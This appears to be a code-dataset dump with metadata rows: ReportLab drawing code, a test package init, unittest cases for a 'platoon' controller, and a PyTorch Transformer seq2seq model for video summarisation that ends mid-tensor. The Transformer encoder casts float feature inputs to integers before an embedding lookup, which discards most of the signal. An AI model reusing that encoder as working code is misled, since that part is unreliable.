self.add(PolyLine(points=[110,67.85714,170,85.71429,200,67.85714,230,103.5714,290,139.2857],strokeColor=Color(1,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(PolyLine(points=[110,85.71429,170,103.5714,200,85.71429,260,139.2857,290,157.1429],strokeColor=Color(0,0,1,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(110,67.85714,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(170,85.71429,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(200,67.85714,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(230,103.5714,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(290,139.2857,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,77.85714)
v0.add(String(-3.75,-4,' 1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,95.71429)
v0.add(String(-3.75,-4,' 2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,200,77.85714)
v0.add(String(-3.75,-4,' 1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,230,113.5714)
v0.add(String(-3.75,-4,' 3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,149.2857)
v0.add(String(-3.75,-4,' 5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Circle(110,85.71429,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(170,103.5714,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(200,85.71429,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(260,139.2857,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(290,157.1429,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,95.71429)
v0.add(String(-3.75,-4,' 2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,113.5714)
v0.add(String(-3.75,-4,' 3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,200,95.71429)
v0.add(String(-3.75,-4,' 2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,260,149.2857)
v0.add(String(-3.75,-4,' 5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,167.1429)
v0.add(String(-3.75,-4,' 6',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 88.903509 | 228 | 0.752047 | 1,710 | 10,135 | 4.431579 | 0.061988 | 0.036949 | 0.034838 | 0.05384 | 0.900238 | 0.879124 | 0.868435 | 0.858934 | 0.853655 | 0.852864 | 0 | 0.139274 | 0.040059 | 10,135 | 113 | 229 | 89.690265 | 0.639634 | 0.005525 | 0 | 0.302752 | 1 | 0 | 0.043862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009174 | false | 0 | 0.018349 | 0 | 0.036697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ce3c2efe1948a109dcc2c7ff0df11f6d514e2e7 | 230 | py | Python | depimpact/tests/__init__.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
] | null | null | null | depimpact/tests/__init__.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
] | null | null | null | depimpact/tests/__init__.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
] | null | null | null | """
"""
from .test_functions import func_overflow, margins_overflow, var_names_overflow, func_sum, multi_output_func_sum
__all__ = ["func_overflow", "margins_overflow", "var_names_overflow", "func_sum", "multi_output_func_sum"]
| 38.333333 | 112 | 0.795652 | 32 | 230 | 5.09375 | 0.4375 | 0.171779 | 0.233129 | 0.331288 | 0.834356 | 0.834356 | 0.834356 | 0.834356 | 0.834356 | 0.834356 | 0 | 0 | 0.078261 | 230 | 5 | 113 | 46 | 0.764151 | 0 | 0 | 0 | 0 | 0 | 0.342342 | 0.094595 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
50f9c46d6503a2e7ce6e3a3f112d8bf5cabb8aa4 | 6,434 | py | Python | platoon/tests/unit/test_controller.py | mila-udem/platoon | 4cd26f4235da06967e20679e4cf769b423269165 | [
"MIT"
] | 212 | 2015-12-18T20:21:44.000Z | 2018-12-05T01:54:18.000Z | platoon/tests/unit/test_controller.py | mila-iqia/platoon | 4cd26f4235da06967e20679e4cf769b423269165 | [
"MIT"
] | 80 | 2015-12-18T18:59:00.000Z | 2018-08-13T07:17:46.000Z | platoon/tests/unit/test_controller.py | mila-iqia/platoon | 4cd26f4235da06967e20679e4cf769b423269165 | [
"MIT"
] | 51 | 2015-12-18T19:03:40.000Z | 2018-12-06T02:12:04.000Z | from __future__ import absolute_import
import six
import unittest
from ...channel import controller
if six.PY3:
buffer_ = memoryview
else:
buffer_ = buffer # noqa
class TestController(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.local_size = 3
cls.devices = ["cuda0", "cuda1", "cuda2"]
cls.control = controller.Controller(5567, devices=cls.devices)
@classmethod
def tearDownClass(cls):
cls.control._close()
def test_is_worker_first(self):
first = self.control._is_worker_first(self.control._am_i_first_count)
assert first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
def test_get_platoon_info(self):
req_info = {}
req_info['local_id'] = '1'
req_info['device'] = 'cuda0'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-1"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 0
assert not res['multinode']
assert res['global_size'] == self.local_size
req_info['local_id'] = '2'
req_info['device'] = 'cuda1'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-1"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 1
assert not res['multinode']
assert res['global_size'] == self.local_size
req_info['local_id'] = '3'
req_info['device'] = 'cuda2'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-1"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 2
assert not res['multinode']
assert res['global_size'] == self.local_size
req_info['local_id'] = 'asdfasfda'
req_info['device'] = 'cuda1'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-asdfasfda"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 1
assert not res['multinode']
assert res['global_size'] == self.local_size
def test_init_new_shmem(self):
self.control._job_uid = "yo"
req_info = {'size': 64}
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_0_buffer"
assert len(self.control.shared_buffers) == 1
assert len(self.control._shmrefs) == 1
assert self.control._last_shmem_name == "platoon-yo_0_buffer"
a = self.control.shared_buffers[res]
try:
buffer_(a)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(0))
assert len(a) == 64
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_0_buffer"
assert len(self.control.shared_buffers) == 1
assert len(self.control._shmrefs) == 1
assert self.control._last_shmem_name == "platoon-yo_0_buffer"
b = self.control.shared_buffers[res]
try:
buffer_(b)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(0))
assert len(b) == 64
assert b == a
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_0_buffer"
assert len(self.control.shared_buffers) == 1
assert len(self.control._shmrefs) == 1
assert self.control._last_shmem_name == "platoon-yo_0_buffer"
c = self.control.shared_buffers[res]
try:
buffer_(c)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(0))
assert len(c) == 64
assert c == a
req_info = {'size': 512}
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_1_buffer"
assert len(self.control.shared_buffers) == 2
assert len(self.control._shmrefs) == 2
assert self.control._last_shmem_name == "platoon-yo_1_buffer"
e = self.control.shared_buffers[res]
try:
buffer_(e)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(1))
assert len(e) == 512
assert e != c
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_1_buffer"
assert len(self.control.shared_buffers) == 2
assert len(self.control._shmrefs) == 2
assert self.control._last_shmem_name == "platoon-yo_1_buffer"
f = self.control.shared_buffers[res]
try:
buffer_(f)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(1))
assert len(f) == 512
assert f != c
assert f == e
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_1_buffer"
assert len(self.control.shared_buffers) == 2
assert len(self.control._shmrefs) == 2
assert self.control._last_shmem_name == "platoon-yo_1_buffer"
g = self.control.shared_buffers[res]
try:
buffer_(g)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(1))
assert len(g) == 512
assert g != c
assert g == e
| 39.231707 | 122 | 0.624029 | 834 | 6,434 | 4.534772 | 0.103118 | 0.154151 | 0.08091 | 0.114225 | 0.840561 | 0.840561 | 0.840561 | 0.783448 | 0.783448 | 0.783448 | 0 | 0.01518 | 0.252565 | 6,434 | 163 | 123 | 39.472393 | 0.771262 | 0.000622 | 0 | 0.613793 | 0 | 0 | 0.188083 | 0.028936 | 0 | 0 | 0 | 0 | 0.462069 | 1 | 0.034483 | false | 0 | 0.027586 | 0 | 0.068966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e863d663bac8af39bd280b8e8f07c8b2e47d0946 | 32,073 | py | Python | seq_sum copy.py | VinACE/trans-vsumm | d3b03fbe09f6d38b9a59ad9b8ceaa732c4f7340a | [
"MIT"
] | 2 | 2020-08-21T06:29:18.000Z | 2020-09-27T00:40:31.000Z | seq_sum copy.py | VinACE/trans-vsumm | d3b03fbe09f6d38b9a59ad9b8ceaa732c4f7340a | [
"MIT"
] | null | null | null | seq_sum copy.py | VinACE/trans-vsumm | d3b03fbe09f6d38b9a59ad9b8ceaa732c4f7340a | [
"MIT"
] | 1 | 2021-04-10T11:50:12.000Z | 2021-04-10T11:50:12.000Z | """
# https://github.com/bentrevett/pytorch-seq2seq/issues/129
# https://github.com/bentrevett/pytorch-seq2seq/blob/master/6%20-%20Attention%20is%20All%20You%20Need.ipynb
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torchtext
from torchtext.datasets import Multi30k
from torchtext.data import Field, BucketIterator
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import spacy
import numpy as np
import random
import math
import time
from IPython.core.debugger import set_trace #set_trace()
######## ENCODER PART #################################
class Encoder(nn.Module):
def __init__(self,
input_dim,
hid_dim,
n_layers,
n_heads,
pf_dim,
dropout,
device,
max_length = 1024):
super().__init__()
self.device = device
self.tok_embedding = nn.Embedding(input_dim, hid_dim)
# self.pos_embedding = nn.Embedding(max_length, hid_dim)
self.layers = nn.ModuleList([EncoderLayer(hid_dim,
n_heads,
pf_dim,
dropout,
device)
for _ in range(n_layers)])
self.dropout = nn.Dropout(dropout)
self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)
def forward(self, src, src_mask):
#src = [batch size, src len]
#src_mask = [batch size, src len]
batch_size = src.shape[0]
# batch_size = 1
src_len = src.shape[1]
pos = torch.arange(0, src_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)
#pos = [batch size, src len]
        src = src.to(self.device).long()
src = self.dropout((self.tok_embedding(src) * self.scale)) # + self.pos_embedding(pos))
#src = [batch size, src len, hid dim]
for layer in self.layers:
src = layer(src, src_mask)
#src = [batch size, src len, hid dim]
return src
class EncoderLayer(nn.Module):
def __init__(self,
hid_dim,
n_heads,
pf_dim,
dropout,
device):
super().__init__()
self.self_attn_layer_norm = nn.LayerNorm(hid_dim)
self.ff_layer_norm = nn.LayerNorm(hid_dim)
self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)
self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim,
pf_dim,
dropout)
self.dropout = nn.Dropout(dropout)
def forward(self, src, src_mask):
#src = [batch size, src len, hid dim]
#src_mask = [batch size, src len]
#self attention
_src, _ = self.self_attention(src, src, src, src_mask)
#dropout, residual connection and layer norm
src = self.self_attn_layer_norm(src + self.dropout(_src))
#src = [batch size, src len, hid dim]
#positionwise feedforward
_src = self.positionwise_feedforward(src)
#dropout, residual and layer norm
src = self.ff_layer_norm(src + self.dropout(_src))
#src = [batch size, src len, hid dim]
return src

#### ATTENTION LAYER #################################################################
class MultiHeadAttentionLayer(nn.Module):
    def __init__(self, hid_dim, n_heads, dropout, device):
        super().__init__()
        assert hid_dim % n_heads == 0
        self.hid_dim = hid_dim
        self.n_heads = n_heads
        self.head_dim = hid_dim // n_heads
        self.fc_q = nn.Linear(hid_dim, hid_dim)
        self.fc_k = nn.Linear(hid_dim, hid_dim)
        self.fc_v = nn.Linear(hid_dim, hid_dim)
        self.fc_o = nn.Linear(hid_dim, hid_dim)
        self.dropout = nn.Dropout(dropout)
        self.scale = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device)

    def forward(self, query, key, value, mask=None):
        batch_size = query.shape[0]
        # query = [batch size, query len, hid dim]
        # key = [batch size, key len, hid dim]
        # value = [batch size, value len, hid dim]
        Q = self.fc_q(query)
        K = self.fc_k(key)
        V = self.fc_v(value)
        # Q = [batch size, query len, hid dim]
        # K = [batch size, key len, hid dim]
        # V = [batch size, value len, hid dim]
        Q = Q.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)
        K = K.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)
        V = V.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)
        # Q = [batch size, n heads, query len, head dim]
        # K = [batch size, n heads, key len, head dim]
        # V = [batch size, n heads, value len, head dim]
        energy = torch.matmul(Q, K.permute(0, 1, 3, 2)) / self.scale
        # energy = [batch size, n heads, query len, key len]
        if mask is not None:
            energy = energy.masked_fill(mask == 0, -1e10)
        attention = torch.softmax(energy, dim=-1)
        # attention = [batch size, n heads, query len, key len]
        x = torch.matmul(self.dropout(attention), V)
        # x = [batch size, n heads, query len, head dim]
        x = x.permute(0, 2, 1, 3).contiguous()
        # x = [batch size, query len, n heads, head dim]
        x = x.view(batch_size, -1, self.hid_dim)
        # x = [batch size, query len, hid dim]
        x = self.fc_o(x)
        # x = [batch size, query len, hid dim]
        return x, attention
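# For intuition, the scaled dot-product step in forward() above (matmul of Q with
# K-transposed, scale by sqrt(head_dim), softmax, weighted sum over V) can be
# sketched torch-free for a single head and a single unbatched sequence. The name
# `scaled_dot_product` and the list-of-vectors representation are illustrative
# only, not part of the module above:

```python
import math

def scaled_dot_product(Q, K, V):
    # Q, K, V: lists of per-position vectors; single head, no batch dimension.
    scale = math.sqrt(len(K[0]))  # sqrt(head_dim), same role as self.scale above
    scores = [[sum(q * k for q, k in zip(qv, kv)) / scale for kv in K] for qv in Q]
    # numerically stable row-wise softmax over key positions
    attn = []
    for row in scores:
        m = max(row)
        exps = [math.exp(s - m) for s in row]
        z = sum(exps)
        attn.append([e / z for e in exps])
    # each output position is an attention-weighted sum of the value vectors
    out = [[sum(a * v[d] for a, v in zip(arow, V)) for d in range(len(V[0]))]
           for arow in attn]
    return out, attn
```

# With two identical keys the attention weights come out uniform, so the output
# is the plain average of the value vectors.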

class PositionwiseFeedforwardLayer(nn.Module):
    def __init__(self, hid_dim, pf_dim, dropout):
        super().__init__()
        self.fc_1 = nn.Linear(hid_dim, pf_dim)
        self.fc_2 = nn.Linear(pf_dim, hid_dim)
        self.dropout = nn.Dropout(dropout)

    def forward(self, x):
        # x = [batch size, seq len, hid dim]
        x = self.dropout(torch.relu(self.fc_1(x)))
        # x = [batch size, seq len, pf dim]
        x = self.fc_2(x)
        # x = [batch size, seq len, hid dim]
        return x

###### decoder part ###############
class Decoder(nn.Module):
    def __init__(self,
                 output_dim,
                 hid_dim,
                 n_layers,
                 n_heads,
                 pf_dim,
                 dropout,
                 device,
                 max_length=1024):
        super().__init__()
        self.device = device
        self.tok_embedding = nn.Embedding(output_dim, hid_dim)
        # self.pos_embedding = nn.Embedding(max_length, hid_dim)
        self.layers = nn.ModuleList([DecoderLayer(hid_dim,
                                                  n_heads,
                                                  pf_dim,
                                                  dropout,
                                                  device)
                                     for _ in range(n_layers)])
        self.fc_out = nn.Linear(hid_dim, output_dim)
        self.dropout = nn.Dropout(dropout)
        self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)

    def forward(self, trg, enc_src, trg_mask, src_mask):
        # trg = [batch size, trg len]
        # enc_src = [batch size, src len, hid dim]
        # trg_mask = [batch size, trg len]
        # src_mask = [batch size, src len]
        batch_size = trg.shape[0]  # was hard-coded to 1, which breaks batched input
        trg_len = trg.shape[1]
        # pos is only consumed by the positional embedding, which is disabled above
        pos = torch.arange(0, trg_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)
        # pos = [batch size, trg len]
        trg = self.dropout(self.tok_embedding(trg) * self.scale)  # + self.pos_embedding(pos)
        # trg = [batch size, trg len, hid dim]
        for layer in self.layers:
            trg, attention = layer(trg, enc_src, trg_mask, src_mask)
        # trg = [batch size, trg len, hid dim]
        # attention = [batch size, n heads, trg len, src len]
        output = self.fc_out(trg)
        # output = [batch size, trg len, output dim]
        return output, attention

############# decoder Layer #################################
class DecoderLayer(nn.Module):
    def __init__(self,
                 hid_dim,
                 n_heads,
                 pf_dim,
                 dropout,
                 device):
        super().__init__()
        self.self_attn_layer_norm = nn.LayerNorm(hid_dim)
        self.enc_attn_layer_norm = nn.LayerNorm(hid_dim)
        self.ff_layer_norm = nn.LayerNorm(hid_dim)
        self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)
        self.encoder_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)
        self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim,
                                                                     pf_dim,
                                                                     dropout)
        self.dropout = nn.Dropout(dropout)

    def forward(self, trg, enc_src, trg_mask, src_mask):
        # trg = [batch size, trg len, hid dim]
        # enc_src = [batch size, src len, hid dim]
        # trg_mask = [batch size, trg len]
        # src_mask = [batch size, src len]

        # self attention
        _trg, _ = self.self_attention(trg, trg, trg, trg_mask)
        # dropout, residual connection and layer norm
        trg = self.self_attn_layer_norm(trg + self.dropout(_trg))
        # trg = [batch size, trg len, hid dim]

        # encoder attention
        _trg, attention = self.encoder_attention(trg, enc_src, enc_src, src_mask)
        # dropout, residual connection and layer norm
        trg = self.enc_attn_layer_norm(trg + self.dropout(_trg))
        # trg = [batch size, trg len, hid dim]

        # positionwise feedforward
        _trg = self.positionwise_feedforward(trg)
        # dropout, residual and layer norm
        trg = self.ff_layer_norm(trg + self.dropout(_trg))
        # trg = [batch size, trg len, hid dim]
        # attention = [batch size, n heads, trg len, src len]
        return trg, attention

class Seq2Seq(nn.Module):
    def __init__(self,
                 encoder,
                 decoder,
                 src_pad_idx,
                 trg_pad_idx,
                 device):
        super().__init__()
        self.encoder = encoder
        self.decoder = decoder
        self.src_pad_idx = src_pad_idx
        self.trg_pad_idx = trg_pad_idx
        self.device = device

    def make_src_mask(self, src):
        # src = [batch size, src len]
        src_mask = (src != self.src_pad_idx).unsqueeze(1).unsqueeze(2)
        # src_mask = [batch size, 1, 1, src len]
        return src_mask

    def make_trg_mask(self, trg):
        # trg = [batch size, trg len]
        trg_pad_mask = (trg != self.trg_pad_idx).unsqueeze(1).unsqueeze(2)
        # trg_pad_mask = [batch size, 1, 1, trg len]
        trg_len = trg.shape[1]
        trg_sub_mask = torch.tril(torch.ones((trg_len, trg_len), device=self.device)).bool()
        # trg_sub_mask = [trg len, trg len]
        trg_mask = trg_pad_mask & trg_sub_mask
        # trg_mask = [batch size, 1, trg len, trg len]
        return trg_mask

    def forward(self, src, trg):
        # src = [batch size, src len]
        # trg = [batch size, trg len]
        src_mask = self.make_src_mask(src)
        trg_mask = self.make_trg_mask(trg)
        # src_mask = [batch size, 1, 1, src len]
        # trg_mask = [batch size, 1, trg len, trg len]
        enc_src = self.encoder(src, src_mask)
        # enc_src = [batch size, src len, hid dim]
        output, attention = self.decoder(trg, enc_src, trg_mask, src_mask)
        # output = [batch size, trg len, output dim]
        # attention = [batch size, n heads, trg len, src len]
        return output, attention
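# How the padding mask and the lower-triangular causal mask combine in
# make_trg_mask can be checked with a torch-free sketch (pad index 0 assumed,
# mirroring trg_pad_idx above; `toy_trg_mask` is an illustrative name, not part
# of the model):

```python
def toy_trg_mask(trg, pad_idx=0):
    # pad mask: True where the token is not padding (cf. trg_pad_mask)
    pad_mask = [tok != pad_idx for tok in trg]
    # causal mask: position i may attend only to positions j <= i (cf. torch.tril)
    n = len(trg)
    return [[pad_mask[j] and j <= i for j in range(n)] for i in range(n)]

mask = toy_trg_mask([1, 7, 4, 0])
# position 0 attends only to itself, and the padding column (index 3)
# stays masked in every row
```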
# if __name__ == "__main__":
# set_trace()
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# x = torch.tensor([[1, 5, 6, 4, 3, 9, 5, 2, 0], [1, 8, 7, 3, 4, 5, 6, 7, 2]]).to(
# device
# )
# trg = torch.tensor([[1, 7, 4, 3, 5, 9, 2, 0], [1, 5, 6, 2, 4, 7, 6, 2]]).to(device)
# src_pad_idx = 0
# trg_pad_idx = 0
# src_vocab_size = 10
# trg_vocab_size = 10
# model = Transformer(src_vocab_size, trg_vocab_size, src_pad_idx, trg_pad_idx).to(
# device
# )
# out, attention = model(x, trg[:, :-1])
# print(out.shape)
# INPUT_DIM = len(SRC.vocab)
# OUTPUT_DIM = len(TRG.vocab)
# if __name__ == "__main__":
# pass
'''
if __name__ == "__main__":
# set_trace()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
INPUT_DIM = 1024
OUTPUT_DIM = 1024
HID_DIM = 256
ENC_LAYERS = 3
DEC_LAYERS = 3
ENC_HEADS = 8
DEC_HEADS = 8
ENC_PF_DIM = 1024 # try this also with 1024
DEC_PF_DIM = 1024
ENC_DROPOUT = 0.1
DEC_DROPOUT = 0.1
SRC_PAD_IDX = 0
TRG_PAD_IDX = 0
enc = Encoder(INPUT_DIM,
HID_DIM,
ENC_LAYERS,
ENC_HEADS,
ENC_PF_DIM,
ENC_DROPOUT,
device)
dec = Decoder(OUTPUT_DIM,
HID_DIM,
DEC_LAYERS,
DEC_HEADS,
DEC_PF_DIM,
DEC_DROPOUT,
device)
# src_vocab_size = 1024
# trg_vocab_size = 1024
# x = torch.tensor([[1, 5, 6, 4, 3, 9, 5, 2, 0, 0], [1, 8, 7, 3, 4, 5, 6, 7, 2, 0]]).to(
# device, dtype=torch.int64
# )
# trg = torch.tensor([[1, 7, 4, 3, 5, 9, 2, 0,0,0], [1, 5, 6, 2, 4, 7, 6, 2,0,0]]).to(device, dtype=torch.int64)
x = torch.tensor([[0.1,0.8,0.8,0.4,0.9,0.4,0.4,0.5,0.4,0.2,0.3,0.8,0.2,0.7,0.6,0.1,0.2,0.1,0.1,0.4,0.2,0.1,0.0,0.5,0.2,0.4,0.3,0.3,0.7,0.1,0.4,0.6,0.5,1.0,0.1,0.8,0.9,0.0,0.2,0.9,0.8,0.0,0.9,0.7,0.2,0.2,0.9,0.6,0.1,0.2,0.6,0.0,0.1,0.1,0.3,0.5,0.8,0.8,0.4,0.4,0.7,0.7,0.4,0.2,0.1,1.0,0.3,0.8,0.1,0.7,0.7,0.9,0.6,0.3,0.8,0.2,0.9,0.6,0.7,0.8,0.2,0.1,1.0,0.6,0.5,0.5,0.5,0.8,0.8,0.3,0.1,0.2,0.5,0.9,0.6,0.8,0.0,0.6,0.2,0.1,0.8,0.4,0.8,0.5,0.8,0.4,0.7,0.6,0.8,0.1,0.4,0.8,1.0,0.9,0.4,0.4,0.4,0.1,0.7,0.3,0.8,0.6,0.4,0.5,0.9,0.1,0.9,0.7,0.4,0.7,0.1,0.8,0.2,0.2,0.7,0.2,0.9,0.6,0.2,0.9,0.1,0.9,0.2,1.0,0.9,0.6,0.3,0.6,0.9,0.6,0.0,0.3,0.4,0.6,0.7,0.9,0.2,0.6,0.2,0.5,0.3,0.3,0.4,0.4,0.1,0.2,0.6,0.0,0.7,0.5,0.5,0.2,0.5,0.6,0.5,0.5,0.7,0.8,0.4,0.5,0.8,0.8,0.1,0.5,0.7,0.8,0.1,0.1,0.8,0.6,0.6,0.4,1.0,0.4,0.6,0.9,0.1,0.6,0.3,1.0,0.7,0.2,0.5,0.5,1.0,0.5,0.4,0.3,0.7,0.1,1.0,0.9,0.4,0.6,0.6,0.6,0.2,0.0,0.9,0.9,0.2,0.1,0.5,0.5,0.8,0.7,0.8,0.0,0.0,0.1,0.5,0.5,0.5,0.8,0.1,0.5,1.0,0.3,0.2,0.8,0.9,0.4,0.4,0.9,0.2,0.4,0.9,0.9,0.3,0.7,0.4,0.9,0.5,0.7,0.8,0.5,0.5,0.5,0.8,0.7,0.9,0.2,0.8,1.0,0.1,0.9,0.6,0.5,0.0,0.2,0.8,0.2,0.8,0.5,0.9,0.9,0.5,0.6,0.1,0.8,1.0,0.3,0.1,0.5,0.9,0.1,0.0,0.5,0.3,0.1,0.5,0.8,0.3,0.4,0.4,0.3,0.2,0.8,0.7,0.6,0.3,0.5,0.1,0.7,0.4,0.2,0.1,0.1,0.4,0.2,0.8,0.8,0.4,0.1,0.0,0.3,0.2,0.0,1.0,0.2,0.6,0.5,0.7,0.7,0.7,0.1,0.2,0.1,0.1,0.9,0.6,0.5,1.0,0.4,0.4,0.8,0.7,0.5,0.6,0.9,0.0,0.8,0.3,0.1,0.5,0.9,0.9,0.9,0.7,0.7,1.0,0.6,0.6,1.0,0.8,1.0,0.4,0.3,0.2,1.0,0.9,0.2,0.